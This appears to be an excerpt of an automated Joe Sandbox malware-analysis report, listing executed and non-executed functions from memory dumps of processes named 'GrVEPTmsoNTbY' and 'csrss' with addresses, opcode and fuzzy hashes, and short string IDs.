                                                      • Opcode ID: 4cf08b807beb86177fe26698fcde08e7472f0c944b41054036d67487a8be95b2
                                                      • Instruction ID: 307375f2f39e48a3ce7c2fd4ed40096ef78becb920e82222f69354ac1956991e
                                                      • Opcode Fuzzy Hash: 4cf08b807beb86177fe26698fcde08e7472f0c944b41054036d67487a8be95b2
                                                      • Instruction Fuzzy Hash: 22C08C305118088FC70CFB2CC89DD60B3E0FB2A201F9200A8D40ECB531EB6A9DE8CB81
                                                      Function 00007FF848E61953 Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ba9585d291f5e8e28fb19cc7ed25b618090365bf794cc933970eb2e67ad85f43
                                                      • Instruction ID: f47f1b3c22eb51c81e5b9e5c002acd9458c22d2e9f6d85beb6f5b0b4ae46c2c4
                                                      • Opcode Fuzzy Hash: ba9585d291f5e8e28fb19cc7ed25b618090365bf794cc933970eb2e67ad85f43
                                                      • Instruction Fuzzy Hash: F3D05E2192DA5A4EEB52B770841A2BD56A2BF10350F8844B8D84EB71D3CF7D74005A84
                                                      Function 00007FF848E606AD Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction ID: b243ce1c8409a49d89244fcce7777f365d9495397e16b6a7a0611b65a11a5de0
                                                      • Opcode Fuzzy Hash: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction Fuzzy Hash: 4CC08C00D1F52B08E445312F14020ACA2007FC46A4FD00032C01C70092AEAD30C5024E
                                                      Function 00007FF848E6559A Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction ID: 3733c24adb4382d9a53a210685dc36ebdcbea8b66b98e3371b2b595405a3d5ea
                                                      • Opcode Fuzzy Hash: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction Fuzzy Hash: 48D0C92AC1D5238FFA72305448241BD0255BBA03B5FA947B2D83D3A1D5AF7DBD41861A
                                                      Function 00007FF848E612D8 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction ID: df46ae11a4307f9da4f694c293df9133eccd3b9680619939cdf0be34c2d8d1d6
                                                      • Opcode Fuzzy Hash: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction Fuzzy Hash: 79C08C309108088FC908FB28C88480837A0FB09200BC20090E008C7170D229ECE0C740
                                                      Function 00007FF848E64E07 Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 197fe891babc001c33dde91eadb533450ec83ce654e6901ce66ad27a688feccf
                                                      • Instruction ID: 4abe43fda8431ec0746db7e9190bbf709e7b13f5a0df92933d6a976dc726d288
                                                      • Opcode Fuzzy Hash: 197fe891babc001c33dde91eadb533450ec83ce654e6901ce66ad27a688feccf
                                                      • Instruction Fuzzy Hash: 62C08C05E0DC5A9AE256620440222BE40829F80B84F9400B5E01E863CACF0C2E0102CA
                                                      Function 00007FF848E606D0 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction ID: c48ea8f83d4bdf98d42c17b782ee6a8e6d6751725dcda34e9f4d2d08d944673f
                                                      • Opcode Fuzzy Hash: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction Fuzzy Hash: E4B01200C6E40F04E408317B084206470407FC4144FC00070D40C70182AA9D3094034A

                                                      Non-executed Functions

                                                      Function 00007FF848E609B0 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c9$!k9$"s9$#{9
                                                      • API String ID: 0-1692736845
                                                      • Opcode ID: cf79c5b567ccb859426320fc966103f1301b8e5d9946be8043e9b4061092b02d
                                                      • Instruction ID: 044a3ba0cf1e019f55236ba56aa21ddff844068ee5ed982584dabd1b33190a10
                                                      • Opcode Fuzzy Hash: cf79c5b567ccb859426320fc966103f1301b8e5d9946be8043e9b4061092b02d
                                                      • Instruction Fuzzy Hash: 50516ADBADE9637DE21D32BDB0011F96B44EF812B9F4C9677E14C890834E18648686FD

                                                      Executed Functions

                                                      Function 00007FF848E80D48 Relevance: 2.8, Strings: 2, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5Y_H$<M_^
                                                      • API String ID: 0-383103648
                                                      • Opcode ID: adbee0d753847597261ef9fb5e16a889c65d56deb06a9f964c73121339a57bae
                                                      • Instruction ID: 2fdca686670c8213a8d6b56304db34ef6400afd44d61deee333f3bb2b496e96c
                                                      • Opcode Fuzzy Hash: adbee0d753847597261ef9fb5e16a889c65d56deb06a9f964c73121339a57bae
                                                      • Instruction Fuzzy Hash: 4091E1B5A1DA8D9FE789EB2888653AD7FE1FB56350F4401BAC00AD72D2DF791805C710
                                                      Function 00007FF848E914BB Relevance: .8, Instructions: 775COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 79d4a24dfaa3488dcd329e616e608c2b0da9c6d11209e0f3ca0541654a05c0ca
                                                      • Instruction ID: 661ce2ed5d04baa9a00498e32de2b7d0e4dbfae7b65151ca110c3d9b705c0d6b
                                                      • Opcode Fuzzy Hash: 79d4a24dfaa3488dcd329e616e608c2b0da9c6d11209e0f3ca0541654a05c0ca
                                                      • Instruction Fuzzy Hash: 7932B421E1CD5A9FE698FA6884516B873A2FF98784F5445B9C00EC32C7DF39AC428785
                                                      Function 00007FF848E80E43 Relevance: .2, Instructions: 170COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5d0e300147b12db17fe0b08022a659885c02e42d5145efa0ae20785ef0d25304
                                                      • Instruction ID: 932463640e9979ca0ce7acf2ba18cad734a2dac01d70ffeb5d2c12f8c364e183
                                                      • Opcode Fuzzy Hash: 5d0e300147b12db17fe0b08022a659885c02e42d5145efa0ae20785ef0d25304
                                                      • Instruction Fuzzy Hash: D851BEB5A29A5D8EE398EB1888697BD7FE1FB86350F4002BAC00AD37D1DFB51416C714
                                                      Function 00007FF848EB38ED Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I_H
                                                      • API String ID: 0-288374528
                                                      • Opcode ID: ba1d587f0c0270a80f42afdf601c6c4ebb5b562b36db83a492993b54650727d7
                                                      • Instruction ID: 4c22a993e660d266a2c3c9d4975fdc558678f6455fa5a1411768310f201fca89
                                                      • Opcode Fuzzy Hash: ba1d587f0c0270a80f42afdf601c6c4ebb5b562b36db83a492993b54650727d7
                                                      • Instruction Fuzzy Hash: 1E81A231E1C98A5FEB98FA2C885627573D2FF64791F0441B9D40EC72C7DE78A8418789
                                                      Function 00007FF848EB3943 Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I_H
                                                      • API String ID: 0-288374528
                                                      • Opcode ID: 832933c38cbed016f9a7ea0979d6a01647e88f5fc2e70c7887522a9f30f6be96
                                                      • Instruction ID: 7eaa62a113a587a3213d0b92ed8aea0aa4d258a81bb76f30d64e88283ca688a8
                                                      • Opcode Fuzzy Hash: 832933c38cbed016f9a7ea0979d6a01647e88f5fc2e70c7887522a9f30f6be96
                                                      • Instruction Fuzzy Hash: 22517E21E1C95E5FEB98FA2C84562B9B2D2FFA4781F448579D40EC72C7DE38A8418385
                                                      Function 00007FF848E939F9 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: e9d10af1b9ed59d83c94183d7c6af2c4edb5cf2e1e1dd6d37097d4994188bd3b
                                                      • Instruction ID: 538681e39e8b4deb11982b87fcc777e952730e097e27c8c5ef8cd1d695503f26
                                                      • Opcode Fuzzy Hash: e9d10af1b9ed59d83c94183d7c6af2c4edb5cf2e1e1dd6d37097d4994188bd3b
                                                      • Instruction Fuzzy Hash: 7FF09B7190E7C44FC71AEA3488694547FA0EF6721174A51EEC045CF1A3DA2DDC45C701
                                                      Function 00007FF848EBA8E9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: af62d64c9eea5667c441b423537b2437a84c908086ff5a8e99bf5604b8924664
                                                      • Instruction ID: 9bc60aab2d95d71ba3516f50865908653f7a6e85a339ffa963ee6dbb17b3229c
                                                      • Opcode Fuzzy Hash: af62d64c9eea5667c441b423537b2437a84c908086ff5a8e99bf5604b8924664
                                                      • Instruction Fuzzy Hash: CBF06D7190E7C48FCB1AEA3488694547FA0EF6720174A46EEC085CF1A3EA2DCC89CB11
                                                      Function 00007FF848EBA859 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: c14079f909465edeacc4e4ac41ab61fc6129e76ed6af58be8bfd6d9e3434686b
                                                      • Instruction ID: 25fad13e3738dcfd67e17979f3d9864b2ea717ffd0f090844797d40fe1b96cf2
                                                      • Opcode Fuzzy Hash: c14079f909465edeacc4e4ac41ab61fc6129e76ed6af58be8bfd6d9e3434686b
                                                      • Instruction Fuzzy Hash: 40F06D7190E7C48FDB1AEB7888698557FA0EF6720174A42EFC045CF1A3EA2DC889C701
                                                      Function 00007FF848EBADE9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 1c3f5f7381fda12de9fd3b56ca3b5b258e950b3deb9177c500fe15ad4dde55b0
                                                      • Instruction ID: fab309a02eb38c18ccbe73b8a32d64f6c988185e2e3e8dcfb88004a3f5813fd3
                                                      • Opcode Fuzzy Hash: 1c3f5f7381fda12de9fd3b56ca3b5b258e950b3deb9177c500fe15ad4dde55b0
                                                      • Instruction Fuzzy Hash: CAE0487144E7D44FCB06EB3484698553F60EF6721578A40EEC045CF1B3E62D988AC701
                                                      Function 00007FF848EB2279 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 3a1ee097e8447e0de5faaae1d02f8aabf37f0114f9ac78b61e4219991670ecbc
                                                      • Instruction ID: 1f3aab2526cadab3994b5b12a911b89d2b7f9689e191491a9806ec64aeeabe8d
                                                      • Opcode Fuzzy Hash: 3a1ee097e8447e0de5faaae1d02f8aabf37f0114f9ac78b61e4219991670ecbc
                                                      • Instruction Fuzzy Hash: 49E01A7184E7C48FCB4AEB74886A9543FA0EE6B21178A40EEC045CF1B3E62D8849C701
                                                      Function 00007FF848E808D0 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 310f9fe2f56f4529c0b080e176f15db6ea47deafde5793eeb017397f8a7d44c7
                                                      • Instruction ID: f4c721cc11e6c19877f299db1d96235c69a6049f793cd408ca0a91d3ed3f1f72
                                                      • Opcode Fuzzy Hash: 310f9fe2f56f4529c0b080e176f15db6ea47deafde5793eeb017397f8a7d44c7
                                                      • Instruction Fuzzy Hash: 28418F52A4E9992EE309B37CA0952FC7780EF45361F1845BFD04DC71D3DE2864818699
                                                      Function 00007FF848E94540 Relevance: .1, Instructions: 114COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 45824dcc48ef378bcdc5184017fbcf0daed4bb1fc2f6102d990a2abf43a3535c
                                                      • Instruction ID: 15dea7d7c2072637053a2983dd6fd61d2f85fd9d46a47fe9b4b16fa957f6c303
                                                      • Opcode Fuzzy Hash: 45824dcc48ef378bcdc5184017fbcf0daed4bb1fc2f6102d990a2abf43a3535c
                                                      • Instruction Fuzzy Hash: E831C43290D6894FE716ABA488215EA7FA1FF97354F0502FBD089C71D3DA68580A8391
                                                      Function 00007FF848E80998 Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74a14c0d6d08d1f4a984ac3ae70772f5ed6ffe6d1df5115cad950b3c16aca0aa
                                                      • Instruction ID: fb6fee02ab0cbcb2dc0e1b3aebb81943906aeddeb2e766a7795c7017bb667716
                                                      • Opcode Fuzzy Hash: 74a14c0d6d08d1f4a984ac3ae70772f5ed6ffe6d1df5115cad950b3c16aca0aa
                                                      • Instruction Fuzzy Hash: 05212521B1DD591FE788B62C544A67D77C2EF99361F5400BAE80EC32D7DE38AC818689
                                                      Function 00007FF848E81171 Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e90aea7d7e2fb258bc494ca917284dfcc11dfa4d7e8c0c4e0671a266e12b86cc
                                                      • Instruction ID: 3ee9b9f2661fa002569fab8a8de56207d2abccdc1d8fc72fd67ef6f0cbc061e6
                                                      • Opcode Fuzzy Hash: e90aea7d7e2fb258bc494ca917284dfcc11dfa4d7e8c0c4e0671a266e12b86cc
                                                      • Instruction Fuzzy Hash: 23316D3190D68A8FDB46EB68C8659AD7BF1FF26340F4805BAC009D72A3DB39A845C751
                                                      Function 00007FF848EB2979 Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8e7d97f272f09ce0f920f9e9171564b71da0ad6ee895b27a10b4aae1be120cce
                                                      • Instruction ID: 18b5dbcde3cd83a4f026fac3099cbc2b8167b821916cd75333d2e040dd9cc7f0
                                                      • Opcode Fuzzy Hash: 8e7d97f272f09ce0f920f9e9171564b71da0ad6ee895b27a10b4aae1be120cce
                                                      • Instruction Fuzzy Hash: 7B318231E1C94A8FDB59EA18C4956A873A2FFA8394F04467AC00ED72C6DF78AC418785
                                                      Function 00007FF848E80960 Relevance: .1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f34e9181bbbe5c1e9189cea231ca90dc12e8d4e0327a88c2ca295de349cfa7c
                                                      • Instruction ID: f0149ae9fefcb5b1bc46d63257f3f1054e7f9d2376b55b603a14856d4b18fe53
                                                      • Opcode Fuzzy Hash: 7f34e9181bbbe5c1e9189cea231ca90dc12e8d4e0327a88c2ca295de349cfa7c
                                                      • Instruction Fuzzy Hash: 6A212251A4DD5A3EF65CB27C644A2FC62C1EF483A1F5890BAE40DC31D3DE28A8804699
                                                      Function 00007FF848E82A19 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 035c5ad3b146be40c5fbf1f7ea6f0c1f034e7770c03c8b43d4b1691ea0a8c3ca
                                                      • Instruction ID: e2916f8f3927bac2856ae2f3f79d098971771a8ef401f154be0260b14a816d97
                                                      • Opcode Fuzzy Hash: 035c5ad3b146be40c5fbf1f7ea6f0c1f034e7770c03c8b43d4b1691ea0a8c3ca
                                                      • Instruction Fuzzy Hash: 03214C21E0C90A8FEBA4FB6884587BC22D2FF94391F9546B5D40DD32A2DF38AC418758
                                                      Function 00007FF848E80C25 Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1301c61026e425fc4b34307b34f1aa0f570787a40bcd17521343c78139a6254
                                                      • Instruction ID: 44a047379d0cf3b85a1af5747c981392c96324331d652d7576fed198d79671b9
                                                      • Opcode Fuzzy Hash: f1301c61026e425fc4b34307b34f1aa0f570787a40bcd17521343c78139a6254
                                                      • Instruction Fuzzy Hash: 6B21D131A0D689AFE712FF28C8452EC7BA0FF42391F9445FAC0449B1D2DB3825498BA5
                                                      Function 00007FF848E96D44 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7be91c1f0ae83a7bd133f5a664b60ff76be4261f50f5324b4559f2b67a2b8251
                                                      • Instruction ID: abbd0e3e283a064e2ebac4cda9bf775290763dd3cefe0422f784367c7492297c
                                                      • Opcode Fuzzy Hash: 7be91c1f0ae83a7bd133f5a664b60ff76be4261f50f5324b4559f2b67a2b8251
                                                      • Instruction Fuzzy Hash: EB117C21E0C91A4FEBA8FB6884516B872D2FF98344F9005BAD40EC72D6DF78AC024784
                                                      Function 00007FF848E83D85 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2d321457ab1106d32db5cb0c737f1f24cc86c4cc4ebc1468c3e7d5a21d4519a5
                                                      • Instruction ID: a35cb591a892d801521c859811156ae2fe338a03ebf17656c776e51da3b09a37
                                                      • Opcode Fuzzy Hash: 2d321457ab1106d32db5cb0c737f1f24cc86c4cc4ebc1468c3e7d5a21d4519a5
                                                      • Instruction Fuzzy Hash: C111DA70908A198FDB94EB08C894FA973E1FB58311F5441AAD40EE7290CB34AEC4CF85
                                                      Function 00007FF848E80C38 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c8e71e527a25eb60cc7bead8d924e8a5263c10bd80aa7d004665807ae16341d
                                                      • Instruction ID: 3e2ee4ab451bbfa1aa9779ae36a969c299aecd2b97b891b4c87c5861ffc68329
                                                      • Opcode Fuzzy Hash: 9c8e71e527a25eb60cc7bead8d924e8a5263c10bd80aa7d004665807ae16341d
                                                      • Instruction Fuzzy Hash: 74118E31A0D68D9FE702FB28D8452EC7FB0FF42351F5546F6C084DB292DA3856498B95
                                                      Function 00007FF848EB7180 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c6ddcd6c5a4e0267749aafe49e673e007e3ca6a37d52b8255175e7da3b0ae95
                                                      • Instruction ID: b71984adc48415056163cd267d1085e04ccf1c7d40b1c881cf8088fd84907d6f
                                                      • Opcode Fuzzy Hash: 3c6ddcd6c5a4e0267749aafe49e673e007e3ca6a37d52b8255175e7da3b0ae95
                                                      • Instruction Fuzzy Hash: B2014E56D8E5922ED70C76BCB8560F43B90EF0227AF0C90B7D08C8A153DE0954898799
                                                      Function 00007FF848EBD67A Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 56eb1fa5da1cbd767d7ff68142e1ba42fcd81ca97e626d5bf86ca61610b1b069
                                                      • Instruction ID: 45e637b210130aaad20636ad6fa7a1e87a47a382ffb265169d189ea747c3b77a
                                                      • Opcode Fuzzy Hash: 56eb1fa5da1cbd767d7ff68142e1ba42fcd81ca97e626d5bf86ca61610b1b069
